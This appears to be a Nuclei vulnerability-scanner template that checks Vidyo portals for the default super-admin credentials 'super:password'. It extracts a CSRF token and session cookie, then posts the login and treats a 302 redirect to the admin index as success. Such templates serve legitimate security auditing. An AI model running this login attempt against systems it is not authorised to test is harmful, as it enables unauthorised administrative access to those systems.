id: vidyo-default-login

info:
  name: Vidyo Default Login
  author: izn0u
  severity: medium
  description: test for default cred super:password
  reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
  tags: vidyo,default-login


requests:
  - raw:
      - |
        GET /super/login.html?lang=en HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

      - |
        POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{RootURL}}/super/login.html?lang=en
        Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en

        username={{username}}&password={{password}}

    payloads:
      username:
        - super
      password:
        - password
    attack: pitchfork

    extractors:
      - type: regex
        name: csrf_tkn
        group: 1
        part: body
        internal: true
        regex:
          - 'csrf_tkn=([A-Za-z0-9.-]+)'

      - type: kval
        name: session
        internal: true
        part: header
        kval:
          - JSESSIONID

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/super/index.html"

      - type: status
        status:
          - 302